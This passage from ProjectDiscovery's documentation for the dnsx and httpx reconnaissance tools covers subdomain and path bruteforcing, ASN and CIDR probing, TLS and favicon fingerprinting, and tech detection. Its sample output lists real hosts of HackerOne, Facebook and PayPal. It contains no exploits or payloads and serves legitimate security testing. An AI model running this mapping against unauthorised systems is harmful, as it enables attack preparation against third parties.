notify.paypal.com
adnormserv-slc-a.paypal.com
a.sandbox.paypal.com
apps2.paypal-labs.com
pilot-payflowpro.paypal.com
www.paypallabs.com
paypal-portal.com
micropayments.paypal-labs.com
minicart.paypal-labs.com
```
***
### DNS Bruteforce
Bruteforce subdomains for given domain or list of domains using `d` and `w` flag:
```console
dnsx -silent -d facebook.com -w dns_worldlist.txt
blog.facebook.com
booking.facebook.com
api.facebook.com
analytics.facebook.com
beta.facebook.com
apollo.facebook.com
ads.facebook.com
box.facebook.com
alpha.facebook.com
apps.facebook.com
connect.facebook.com
c.facebook.com
careers.facebook.com
code.facebook.com
```
Bruteforce targeted subdomain using single or multiple keyword input, as `d` or `w` flag supports file or comma separated keyword inputs:
```console
dnsx -silent -d domains.txt -w jira,grafana,jenkins
grafana.1688.com
grafana.8x8.vc
grafana.airmap.com
grafana.aerius.nl
jenkins.1688.com
jenkins.airbnb.app
jenkins.airmap.com
jenkins.ahn.nl
jenkins.achmea.nl
jira.amocrm.com
jira.amexgbt.com
jira.amitree.com
jira.arrival.com
jira.atlassian.net
jira.atlassian.com
```
Values are accepted from **stdin** for all the input types (`-list`, `-domain`, `-wordlist`). The `-list` flag defaults to `stdin`, but the same can be achieved for other input types by adding a `-` (dash) as parameter:
```console
cat domains.txt | dnsx -silent -w jira,grafana,jenkins -d -
grafana.1688.com
grafana.8x8.vc
grafana.airmap.com
grafana.aerius.nl
jenkins.1688.com
jenkins.airbnb.app
jenkins.airmap.com
jenkins.ahn.nl
jenkins.achmea.nl
jira.amocrm.com
jira.amexgbt.com
jira.amitree.com
jira.arrival.com
jira.atlassian.net
jira.atlassian.com
```
#### DNS Bruteforce with Placeholder based wordlist
```bash
$ cat tld.txt
com
by
de
be
al
bi
cg
dj
bs
```
```console
dnsx -d google.FUZZ -w tld.txt -resp
_ __ __
__| | _ __ ___ \ \/ /
/ _' || '_ \ / __| \ /
| (_| || | | |\__ \ / \
\__,_||_| |_||___//_/\_\ v1.1.2
projectdiscovery.io
google.de [142.250.194.99]
google.com [142.250.76.206]
google.be [172.217.27.163]
google.bs [142.251.42.35]
google.bi [216.58.196.67]
google.al [216.58.196.68]
google.by [142.250.195.4]
google.cg [142.250.183.131]
google.dj [142.250.192.3]
```
### Wildcard filtering
A special feature of `dnsx` is its ability to handle **multi-level DNS based wildcards**, and do it so with a very reduced number of DNS requests. Sometimes all the subdomains will resolve, which leads to lots of garbage in the output. The way `dnsx` handles this is by keeping track of how many subdomains point to an IP and if the count of the subdomains increase beyond a certain threshold, it will check for wildcards on all the levels of the hosts for that IP iteratively.
```console
dnsx -l subdomain_list.txt -wd airbnb.com -o output.txt
```
***
### Dnsx as a library
It's possible to use the library directly in your golang programs. The following code snippets is an example of use in golang programs. Please refer to [here](https://pkg.go.dev/github.com/projectdiscovery/dnsx@v1.1.0/libs/dnsx) for detailed package configuration and usage.
```go
package main
import (
"fmt"
"github.com/projectdiscovery/dnsx/libs/dnsx"
)
func main() {
// Create DNS Resolver with default options
dnsClient, err := dnsx.New(dnsx.DefaultOptions)
if err != nil {
fmt.Printf("err: %v\n", err)
return
}
// DNS A question and returns corresponding IPs
result, err := dnsClient.Lookup("hackerone.com")
if err != nil {
fmt.Printf("err: %v\n", err)
return
}
for idx, msg := range result {
fmt.Printf("%d: %s\n", idx+1, msg)
}
// Query
rawResp, err := dnsClient.QueryOne("hackerone.com")
if err != nil {
fmt.Printf("err: %v\n", err)
return
}
fmt.Printf("rawResp: %v\n", rawResp)
jsonStr, err := rawResp.JSON()
if err != nil {
fmt.Printf("err: %v\n", err)
return
}
fmt.Println(jsonStr)
return
}
```
# dnsx Usage
Source: https://docs.projectdiscovery.io/tools/dnsx/usage
Learn dnsx usage including queries, filters, and configurations
## Access help
Use `dnsx -h` to display all of the help options.
## Help options
```console
INPUT:
-l, -list string list of sub(domains)/hosts to resolve (file or stdin)
-d, -domain string list of domain to bruteforce (file or comma separated or stdin)
-w, -wordlist string list of words to bruteforce (file or comma separated or stdin)
QUERY:
-a query A record (default)
-aaaa query AAAA record
-cname query CNAME record
-ns query NS record
-txt query TXT record
-srv query SRV record
-ptr query PTR record
-mx query MX record
-soa query SOA record
-axfr query AXFR
-caa query CAA record
-any query ANY record
FILTER:
-re, -resp display dns response
-ro, -resp-only display dns response only
-rc, -rcode string filter result by dns status code (eg. -rcode noerror,servfail,refused)
PROBE:
-cdn display cdn name
-asn display host asn information
RATE-LIMIT:
-t, -threads int number of concurrent threads to use (default 100)
-rl, -rate-limit int number of dns request/second to make (disabled as default) (default -1)
UPDATE:
-up, -update update dnsx to latest version
-duc, -disable-update-check disable automatic dnsx update check
OUTPUT:
-o, -output string file to write output
-j, -json write output in JSONL(ines) format
-omit-raw, -or omit raw dns response from jsonl output
DEBUG:
-hc, -health-check run diagnostic check up
-silent display only results in the output
-v, -verbose display verbose output
-raw, -debug display raw dns response
-stats display stats of the running scan
-version display version of dnsx
OPTIMIZATION:
-retry int number of dns attempts to make (must be at least 1) (default 2)
-hf, -hostsfile use system host file
-trace perform dns tracing
-trace-max-recursion int Max recursion for dns trace (default 32767)
-resume resume existing scan
-stream stream mode (wordlist, wildcard, stats and stop/resume will be disabled)
CONFIGURATIONS:
-r, -resolver string list of resolvers to use (file or comma separated)
-wt, -wildcard-threshold int wildcard filter threshold (default 5)
-wd, -wildcard-domain string domain name for wildcard filtering (other flags will be ignored)
```
## Notes on usage
* By default, `dnsx` checks for **A** record.
* By default `dnsx` uses Google, Cloudflare, Quad9 [resolver](https://github.com/projectdiscovery/dnsx/blob/43af78839e237ea8cbafe571df1ab0d6cbe7f445/libs/dnsx/dnsx.go#L31).
* A custom resolver list can be loaded using the `r` flag.
* Domain name (`wd`) input is mandatory for wildcard elimination.
* The DNS record flag cannot be used when using wildcard filtering.
* DNS resolution (`l`) and DNS brute-forcing (`w`) can't be used together.
* VPN operators tend to filter high DNS/UDP traffic, therefore the tool might experience packets loss (eg. [Mullvad VPN](https://github.com/projectdiscovery/dnsx/issues/221))
`dnsx` is made with 🖤 by the [projectdiscovery](https://projectdiscovery.io) team.
# Installing httpx
Source: https://docs.projectdiscovery.io/tools/httpx/install
Learn about how to install and get started with httpx
Enter the command below in a terminal to install ProjectDiscovery's httpx using Go.
```bash
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
```
```bash
brew install httpx
```
Supported in **macOS** (or Linux)
```bash
docker pull projectdiscovery/httpx:latest
```
{/* Docker-specific usage instructions can be found [here](./running#running-with-docker). */}
Enter the commands below in a terminal to install ProjectDiscovery's httpx using GitHub.
```bash
git clone https://github.com/projectdiscovery/httpx.git; \
cd httpx/cmd/httpx; \
go build; \
mv httpx /usr/local/bin/; \
httpx -version;
```
```bash
https://github.com/projectdiscovery/httpx/releases
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
## Installation Notes
* httpx requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export PATH=$PATH:$HOME/go/bin >> $HOME/.bashrc
source $HOME/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$home/go/bin/httpx`
# httpx Overview
Source: https://docs.projectdiscovery.io/tools/httpx/overview
An HTTP toolkit that probes services, web servers, and other valuable metadata
## What is **httpx?**
httpx is a fast and multi-purpose HTTP toolkit built to support running multiple probes using a public library.
Probes are specific tests or checks to gather information about web servers, URLs, or other HTTP elements.
Httpx is designed to maintain result reliability with an increased number of threads.
Typically, users employ httpx to efficiently identify and analyze web server configurations, verify HTTP responses, and diagnose potential vulnerabilities or misconfigurations.
It can also be in a pipeline that transitions from asset identification to technology enrichment and then feeds into detection of vulnerabilities.
## Features and capabilities
* A simple and modular code base for easy contribution
* Configurable flags to probe multiple elements
* Support for multiple HTTP based probes
* Smart auto-fallback from https to http
* Support for hosts, URLs and CIDR
* Handling for edge cases: retries, backoffs for WAFs
* UI Dashboard for results
## Additional httpx resources
As an open source tool with a robust community there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
ProjectDiscovery’s httpx should not be confused with the httpx python library.Sharing these resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
* [https://www.kali.org/tools/httpx-toolkit/](https://www.kali.org/tools/httpx-toolkit/)
* [https://www.hackingarticles.in/a-detailed-guide-on-httpx/](https://www.hackingarticles.in/a-detailed-guide-on-httpx/)
## Support
Questions about using httpx? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running httpx
Source: https://docs.projectdiscovery.io/tools/httpx/running
Learn about running httpx with examples including commands and output
For all of the flags and options available for `httpx` be sure to check out the [Usage](/tools/httpx/usage) page. On this page we'll share examples running httpx with specific flags and goals
and the output you can expect from each.
If you have questions, reach out to us through [Help](/help).
## Basic Examples
### ASN Fingerprint
Use `httpx` with the `-asn` flag for ASN (Autonomous System Number) fingerprinting, an effective technique for mapping the network affiliations of various domains.
```
subfinder -d hackerone.com -silent | httpx -asn
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.2.1
projectdiscovery.io
Use with caution. You are responsible for your actions.
Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.managed.hackerone.com [AS54113, FASTLY, US]
https://gslink.hackerone.com [AS16509, AMAZON-02, US]
https://www.hackerone.com [AS13335, CLOUDFLARENET, US]
https://mta-sts.forwarding.hackerone.com [AS54113, FASTLY, US]
https://resources.hackerone.com [AS16509, AMAZON-02, US]
https://support.hackerone.com [AS13335, CLOUDFLARENET, US]
https://mta-sts.hackerone.com [AS54113, FASTLY, US]
https://docs.hackerone.com [AS54113, FASTLY, US]
https://api.hackerone.com [AS13335, CLOUDFLARENET, US]
```
### ASN Input
Specify an [autonomous system's number (ASN)](https://en.wikipedia.org/wiki/Autonomous_system_\(Internet\)) and `httpx` will fetch all ip addresses of that autonomous system and probe them
```
echo AS14421 | httpx -silent
https://216.101.17.248
https://216.101.17.249
https://216.101.17.250
https://216.101.17.251
https://216.101.17.252
```
### CIDR Input
Run `httpx` with CIDR input (for example 173.0.84.0/24)
```
echo 173.0.84.0/24 | httpx -silent
https://173.0.84.29
https://173.0.84.43
https://173.0.84.31
https://173.0.84.44
https://173.0.84.12
https://173.0.84.4
https://173.0.84.36
https://173.0.84.45
https://173.0.84.14
https://173.0.84.25
https://173.0.84.46
https://173.0.84.24
https://173.0.84.32
https://173.0.84.9
https://173.0.84.13
https://173.0.84.6
https://173.0.84.16
https://173.0.84.34
```
### Docker Run
Use Docker to run `httpx` in an isolated container. For example, by piping subdomain lists into the Docker container, you can seamlessly perform probing across multiple targets, harnessing the power of `httpx` without direct installation requirements.
```
cat sub_domains.txt | docker run -i projectdiscovery/httpx
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.1.2
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.forwarding.hackerone.com
https://mta-sts.hackerone.com
https://mta-sts.managed.hackerone.com
https://www.hackerone.com
https://api.hackerone.com
https://gslink.hackerone.com
https://resources.hackerone.com
https://docs.hackerone.com
https://support.hackerone.com
```
### Error Page Classifier and Filtering
The Error Page Classifier and Filtering feature aims to add intelligence to `httpx` by enabling `httpx` to classify and filter out common error pages returned by web applications.
It is an enhancement geared towards reducing noise and helping focus on actual results.
Using the `-fep` or `-filter-error-page` option creates a filtered error page in the file `filtered_error_page.json` in jsonline format.
```
httpx -l urls.txt -path /v1/api -fep
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/
projectdiscovery.io
[INF] Current httpx version v1.3.3 (latest)
https://scanme.sh/v1/api
```
### Favicon Hash
Extract and display the mmh3 hash of the '/favicon.ico' file from given targets.
```
subfinder -d hackerone.com -silent | httpx -favicon
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.1.5
projectdiscovery.io
Use with caution. You are responsible for your actions.
Developers assume no liability and are not responsible for any misuse or damage.
https://docs.hackerone.com/favicon.ico [595148549]
https://hackerone.com/favicon.ico [595148549]
https://mta-sts.managed.hackerone.com/favicon.ico [-1700323260]
https://mta-sts.forwarding.hackerone.com/favicon.ico [-1700323260]
https://support.hackerone.com/favicon.ico [-1279294674]
https://gslink.hackerone.com/favicon.ico [1506877856]
https://resources.hackerone.com/favicon.ico [-1840324437]
https://api.hackerone.com/favicon.ico [566218143]
https://mta-sts.hackerone.com/favicon.ico [-1700323260]
https://www.hackerone.com/favicon.ico [778073381]
```
### File/Path Bruteforce
Use `httpx` with the `-path` option for efficient File/Path Bruteforcing. This feature allows probing specific paths across multiple URLs, uncovering response codes and revealing potentially vulnerable or unsecured endpoints in web applications.
```
httpx -l urls.txt -path /v1/api -sc
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.1.5
projectdiscovery.io
Use with caution. You are responsible for your actions.
Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.managed.hackerone.com/v1/api [404]
https://mta-sts.hackerone.com/v1/api [404]
https://mta-sts.forwarding.hackerone.com/v1/api [404]
https://docs.hackerone.com/v1/api [404]
https://api.hackerone.com/v1/api [401]
https://hackerone.com/v1/api [302]
https://support.hackerone.com/v1/api [404]
https://resources.hackerone.com/v1/api [301]
https://gslink.hackerone.com/v1/api [404]
http://www.hackerone.com/v1/api [301]
```
### File Input
Run `httpx` with the `-probe` flag against all the hosts in hosts.txt to return URLs with probed status.
```
httpx -list hosts.txt -silent -probe
http://ns.hackerone.com [FAILED]
https://docs.hackerone.com [SUCCESS]
https://mta-sts.hackerone.com [SUCCESS]
https://mta-sts.managed.hackerone.com [SUCCESS]
http://email.hackerone.com [FAILED]
https://mta-sts.forwarding.hackerone.com [SUCCESS]
http://links.hackerone.com [FAILED]
https://api.hackerone.com [SUCCESS]
https://www.hackerone.com [SUCCESS]
http://events.hackerone.com [FAILED]
https://support.hackerone.com [SUCCESS]
https://gslink.hackerone.com [SUCCESS]
http://o1.email.hackerone.com [FAILED]
http://info.hackerone.com [FAILED]
https://resources.hackerone.com [SUCCESS]
http://o2.email.hackerone.com [FAILED]
http://o3.email.hackerone.com [FAILED]
http://go.hackerone.com [FAILED]
http://a.ns.hackerone.com [FAILED]
http://b.ns.hackerone.com [FAILED]
```
### JARM Fingerprint
Use `httpx` with the `-jarm` flag to leverage JARM fingerprinting, a specialized tool for active TLS server fingerprinting.
This approach enables the identification and categorization of servers based on their TLS configurations, making it an effective method for detecting and analyzing diverse internet servers,
including potential security threats.
```
subfinder -d hackerone.com -silent | httpx -jarm
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.2.1
projectdiscovery.io
Use with caution. You are responsible for your actions.
Developers assume no liability and are not responsible for any misuse or damage.
https://www.hackerone.com [29d3dd00029d29d00042d43d00041d5de67cc9954cc85372523050f20b5007]
https://mta-sts.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af]
https://mta-sts.managed.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af]
https://docs.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af]
https://support.hackerone.com [29d3dd00029d29d00029d3dd29d29d5a74e95248e58a6162e37847a24849f7]
https://api.hackerone.com [29d3dd00029d29d00042d43d00041d5de67cc9954cc85372523050f20b5007]
https://mta-sts.forwarding.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af]
https://resources.hackerone.com [2ad2ad0002ad2ad0002ad2ad2ad2ad043bfbd87c13813505a1b60adf4f6ff5]
```
### Tool Chain
Combining `httpx` with other tools like `subfinder` can elevate your web reconnaissance.
For example, pipe results from `subfinder` directly into 'httpx' to efficiently identify active web servers and their technologies across various subdomains of a given target.
```
subfinder -d hackerone.com -silent| httpx -title -tech-detect -status-code
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.1.1
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.managed.hackerone.com [404] [Page not found · GitHub Pages] [Varnish,GitHub Pages,Ruby on Rails]
https://mta-sts.hackerone.com [404] [Page not found · GitHub Pages] [Varnish,GitHub Pages,Ruby on Rails]
https://mta-sts.forwarding.hackerone.com [404] [Page not found · GitHub Pages] [GitHub Pages,Ruby on Rails,Varnish]
https://docs.hackerone.com [200] [HackerOne Platform Documentation] [Ruby on Rails,jsDelivr,Gatsby,React,webpack,Varnish,GitHub Pages]
https://support.hackerone.com [301,302,301,200] [HackerOne] [Cloudflare,Ruby on Rails,Ruby]
https://resources.hackerone.com [301,301,404] [Sorry, no Folders found.]
```
### URL probe
Run `httpx` against all the hosts and subdomains in hosts.txt to return URLs running an HTTP webserver.
```
cat hosts.txt | httpx
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_| v1.1.1
/_/
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.managed.hackerone.com
https://mta-sts.hackerone.com
https://mta-sts.forwarding.hackerone.com
https://docs.hackerone.com
https://www.hackerone.com
https://resources.hackerone.com
https://api.hackerone.com
https://support.hackerone.com
```
## UI Dashboard (PDCP Integration)
#### Configure API Key
To upload your assets to PDCP you will need to create a free API Key
* **Obtain API Key:**
* Visit [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io)
* Open the setting menu from the top right and select "API Key" to create your API Key
* Use the `httpx -auth` command, and enter your API key when prompted.
#### Configure Team (Optional)
If you want to upload the asset results to a team workspace instead of your personal workspace, you can configure the Team ID. You can use either the CLI option or the environment variable, depending on your preference.
* **Obtain Team ID:**
* To obtain your Team ID, navigate to [https://cloud.projectdiscovery.io/settings/team](https://cloud.projectdiscovery.io/settings/team) and copy the Team ID from the top right section.
![image](https://github.com/user-attachments/assets/76a9f102-1626-4c87-8d9e-37c30417f19e)
* **CLI Option:**
* Use the `-tid` or `-team-id` option to specify the team ID.
* Example: `nuclei -tid XXXXXX -dashboard`
* **ENV Variable:**
* Set the `PDCP_TEAM_ID` environment variable to your team ID.
* Example: `export PDCP_TEAM_ID=XXXXX`
Either of these options is sufficient to configure the Team ID.
#### Run httpx with UI Dashboard
To run `httpx` and upload the results to the UI Dashboard:
```console
$ chaos -d hackerone.com | httpx -dashboard
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/
projectdiscovery.io
[INF] Current httpx version v1.6.6 (latest)
[INF] To view results on UI dashboard, visit https://cloud.projectdiscovery.io/assets upon completion.
http://a.ns.hackerone.com
https://www.hackerone.com
http://b.ns.hackerone.com
https://api.hackerone.com
https://mta-sts.forwarding.hackerone.com
https://docs.hackerone.com
https://support.hackerone.com
https://mta-sts.hackerone.com
https://gslink.hackerone.com
[INF] Found 10 results, View found results in dashboard : https://cloud.projectdiscovery.io/assets/cqd56lebh6us73bi22pg
```
![image](https://blog.projectdiscovery.io/content/images/size/w1600/2024/08/image.png)
#### Uploading to an Existing Asset Group
To upload new assets to an existing asset group:
```console
$ chaos -d hackerone.com | httpx -dashboard -aid existing-asset-id
```
#### Setting an Asset Group Name
To set a custom asset group name:
```console
$ chaos -d hackerone.com | httpx -dashboard -aname "Custom Asset Group"
```
### Additional upload options
* `-pd, -dashboard`: Enable uploading of `httpx` results to the ProjectDiscovery Cloud (PDCP) UI Dashboard.
* `-aid, -asset-id string`: Upload new assets to an existing asset ID (optional).
* `-aname, -asset-name string`: Set the asset group name (optional).
* `-pdu, -dashboard-upload string`: Upload `httpx` output file (jsonl) to the ProjectDiscovery Cloud (PDCP) UI Dashboard.
### Environment Variables
* `export ENABLE_CLOUD_UPLOAD=true`: Enable dashboard upload by default.
* `export DISABLE_CLOUD_UPLOAD_WARN=true`: Disable dashboard warning.
* `export PDCP_TEAM_ID=XXXXX`: Set the team ID for the ProjectDiscovery Cloud Platform.
## Expanded Examples
### Using httpx as a library
httpx can be used as a library by creating an instance of the Option struct and populating it with the same options that would be specified via CLI.
Once validated, the struct should be passed to a runner instance (to be closed at the end of the program) and the RunEnumeration method should be called.
* A basic example of how to use httpx as a library is available in the [GitHub examples](https://github.com/projectdiscovery/httpx/tree/main/examples) folder.
### Using httpx screenshot
Httpx includes support for taking a screenshot with `-screenshot` that gives users the ability to take screenshots of target URLs, pages, or endpoints along with the rendered DOM.
This functionality enables a comprehensive view of the target's visual content.
Rendered DOM body is also included in json line output when `-screenshot` option is used with `-json` option.
To use this feature, add the `-screenshot` flag to the `httpx` command.
`httpx -screenshot -u https://example.com`
Screenshots are captured using a headless browser, and as a result `httpx` will be slower when using the `-screenshot` option.
#### Domain, Subdomain, and Path Support
The `-screenshot` option is versatile and can be used to capture screenshots for domains, subdomains, and even specific paths when used in conjunction with the `-path` option:
```
httpx -screenshot -u example.com
httpx -screenshot -u https://example.com/login
httpx -screenshot -path fuzz_path.txt -u https://example.com
```
#### Using with Other Tools
In the example below we're providing subfinder output to the `httpx` screenshot.
```
subfinder -d example.com | httpx -screenshot
```
#### System Chrome Support
By default, `httpx` uses the go-rod library to install and manage Chrome for taking screenshots.
However, if you prefer to use your locally installed system Chrome, add the `-system-chrome` flag:
```
httpx -screenshot -system-chrome -u https://example.com
```
#### Output Directory
Screenshots are stored in the output/screenshot directory by default. To specify a custom output directory, use the `-srd` option:
```
httpx -screenshot -srd /path/to/custom/directory -u https://example.com
```
#### Body Preview
Body preview shows first N characters of response. And strip html tags in response.
```
httpx -u https://example.com -silent -body-preview
https://example.com [Example Domain This domain is for use in illustrative examples in documents. You may use this domai]
```
```
httpx -u https://example.com -silent -body-preview=200 -strip=html
https://example.com [Example Domain This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission. More information...]
```
# Httpx Usage
Source: https://docs.projectdiscovery.io/tools/httpx/usage
Learn httpx usage including flags, probes, and options
## Access help
Use `httpx - h` to display all help options.
## Httpx help options
```
Flags:
INPUT:
-l, -list string input file containing list of hosts to process
-rr, -request string file containing raw request
-u, -target string[] input target host(s) to probe
PROBES:
-sc, -status-code display response status-code
-cl, -content-length display response content-length
-ct, -content-type display response content-type
-location display response redirect location
-favicon display mmh3 hash for '/favicon.ico' file
-hash string display response body hash (supported: md5,mmh3,simhash,sha1,sha256,sha512)
-jarm display jarm fingerprint hash
-rt, -response-time display response time
-lc, -line-count display response body line count
-wc, -word-count display response body word count
-title display page title
-bp, -body-preview display first N characters of response body (default 100)
-server, -web-server display server name
-td, -tech-detect display technology in use based on wappalyzer dataset
-method display http request method
-websocket display server using websocket
-ip display host ip
-cname display host cname
-asn display host asn information
-cdn display cdn/waf in use
-probe display probe status
HEADLESS:
-ss, -screenshot enable saving screenshot of the page using headless browser
-system-chrome enable using local installed chrome for screenshot
-esb, -exclude-screenshot-bytes enable excluding screenshot bytes from json output
-ehb, -exclude-headless-body enable excluding headless header from json output
MATCHERS:
-mc, -match-code string match response with specified status code (-mc 200,302)
-ml, -match-length string match response with specified content length (-ml 100,102)
-mlc, -match-line-count string match response body with specified line count (-mlc 423,532)
-mwc, -match-word-count string match response body with specified word count (-mwc 43,55)
-mfc, -match-favicon string[] match response with specified favicon hash (-mfc 1494302000)
-ms, -match-string string match response with specified string (-ms admin)
-mr, -match-regex string match response with specified regex (-mr admin)
-mcdn, -match-cdn string[] match host with specified cdn provider (cloudfront, fastly, google, leaseweb, stackpath)
-mrt, -match-response-time string match response with specified response time in seconds (-mrt '< 1')
-mdc, -match-condition string match response with dsl expression condition
EXTRACTOR:
-er, -extract-regex string[] display response content with matched regex
-ep, -extract-preset string[] display response content matched by a pre-defined regex (ipv4,mail,url)
FILTERS:
-fc, -filter-code string filter response with specified status code (-fc 403,401)
-fep, -filter-error-page filter response with ML based error page detection
-fd, -filter-duplicates filter out near-duplicate responses (only first response is retained)
-fl, -filter-length string filter response with specified content length (-fl 23,33)
-flc, -filter-line-count string filter response body with specified line count (-flc 423,532)
-fwc, -filter-word-count string filter response body with specified word count (-fwc 423,532)
-ffc, -filter-favicon string[] filter response with specified favicon hash (-ffc 1494302000)
-fs, -filter-string string filter response with specified string (-fs admin)
-fe, -filter-regex string filter response with specified regex (-fe admin)
-fcdn, -filter-cdn string[] filter host with specified cdn provider (cloudfront, fastly, google, leaseweb, stackpath)
-frt, -filter-response-time string filter response with specified response time in seconds (-frt '> 1')
-fdc, -filter-condition string filter response with dsl expression condition
-strip strips all tags in response. supported formats: html,xml (default html)
RATE-LIMIT:
-t, -threads int number of threads to use (default 50)
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
MISCELLANEOUS:
-pa, -probe-all-ips probe all the ips associated with same host
-p, -ports string[] ports to probe (nmap syntax: eg http:1,2-10,11,https:80)
-path string path or list of paths to probe (comma-separated, file)
-tls-probe send http probes on the extracted TLS domains (dns_name)
-csp-probe send http probes on the extracted CSP domains
-tls-grab perform TLS(SSL) data grabbing
-pipeline probe and display server supporting HTTP1.1 pipeline
-http2 probe and display server supporting HTTP2
-vhost probe and display server supporting VHOST
-ldv, -list-dsl-variables list json output field keys name that support dsl matcher/filter
UPDATE:
-up, -update update httpx to latest version
-duc, -disable-update-check disable automatic httpx update check
OUTPUT:
-o, -output string file to write output results
-oa, -output-all filename to write output results in all formats
-sr, -store-response store http response to output directory
-srd, -store-response-dir string store http response to custom directory
-csv store output in csv format
-csvo, -csv-output-encoding string define output encoding
-j, -json store output in JSONL(ines) format
-irh, -include-response-header include http response (headers) in JSON output (-json only)
-irr, -include-response include http request/response (headers + body) in JSON output (-json only)
-irrb, -include-response-base64 include base64 encoded http request/response in JSON output (-json only)
-include-chain include redirect http chain in JSON output (-json only)
-store-chain include http redirect chain in responses (-sr only)
-svrc, -store-vision-recon-cluster include visual recon clusters (-ss and -sr only)
CONFIGURATIONS:
-config string path to the httpx configuration file (default $HOME/.config/httpx/config.yaml)
-r, -resolvers string[] list of custom resolver (file or comma separated)
-allow string[] allowed list of IP/CIDR's to process (file or comma separated)
-deny string[] denied list of IP/CIDR's to process (file or comma separated)
-sni, -sni-name string custom TLS SNI name
-random-agent enable Random User-Agent to use (default true)
-H, -header string[] custom http headers to send with request
-http-proxy, -proxy string http proxy to use (eg http://127.0.0.1:8080)
-unsafe send raw requests skipping golang normalization
-resume resume scan using resume.cfg
-fr, -follow-redirects follow http redirects
-maxr, -max-redirects int max number of redirects to follow per host (default 10)
-fhr, -follow-host-redirects follow redirects on the same host
-rhsts, -respect-hsts respect HSTS response headers for redirect requests
-vhost-input get a list of vhosts as input
-x string request methods to probe, use 'all' to probe all HTTP methods
-body string post body to include in http request
-s, -stream stream mode - start elaborating input targets without sorting
-sd, -skip-dedupe disable dedupe input items (only used with stream mode)
-ldp, -leave-default-ports leave default http/https ports in host header (eg. http://host:80 - https://host:443
-ztls use ztls library with autofallback to standard one for tls13
-no-decode avoid decoding body
-tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization
-no-stdin Disable Stdin processing
DEBUG:
-health-check, -hc run diagnostic check up
-debug display request/response content in cli
-debug-req display request content in cli
-debug-resp display response content in cli
-version display httpx version
-stats display scan statistic
-profile-mem string optional httpx memory profile dump file
-silent silent mode
-v, -verbose verbose mode
-si, -stats-interval int number of seconds to wait between showing a statistics update (default: 5)
-nc, -no-color disable colors in cli output
OPTIMIZATIONS:
-nf, -no-fallback display both probed protocol (HTTPS and HTTP)
-nfs, -no-fallback-scheme probe with protocol scheme specified in input
-maxhr, -max-host-error int max error count per host before skipping remaining path/s (default 30)
-ec, -exclude-cdn skip full port scans for CDN/WAF (only checks for 80,443)
-retries int number of retries
-timeout int timeout in seconds (default 10)
-delay value duration between each http request (eg: 200ms, 1s) (default -1ns)
-rsts, -response-size-to-save int max response size to save in bytes (default 2147483647)
-rstr, -response-size-to-read int max response size to read in bytes (default 2147483647)
```
## Notes on usage
* As default an `httpx` probe with an HTTPS scheme will fall-back to HTTP only if HTTPS is not reachable.
* The `-no-fallback` flag can be used to probe and display both HTTP and HTTPS result.
* Custom scheme for ports can be defined, for example `-ports http:443,http:80,https:8443`
* Custom resolver supports multiple protocol (doh|tcp|udp) in form of protocol:resolver:port (for example `udp:127.0.0.1:53`)
* The following flags should be used for specific use cases instead of running them as default with other probes:
* `- ports`
* `- path`
* `- vhost`
* `- screenshot`
* `- csp-probe`
* `- tls-probe`
* `- favicon`
* `- http2`
* `- pipeline`
* `- tls-impersonate`
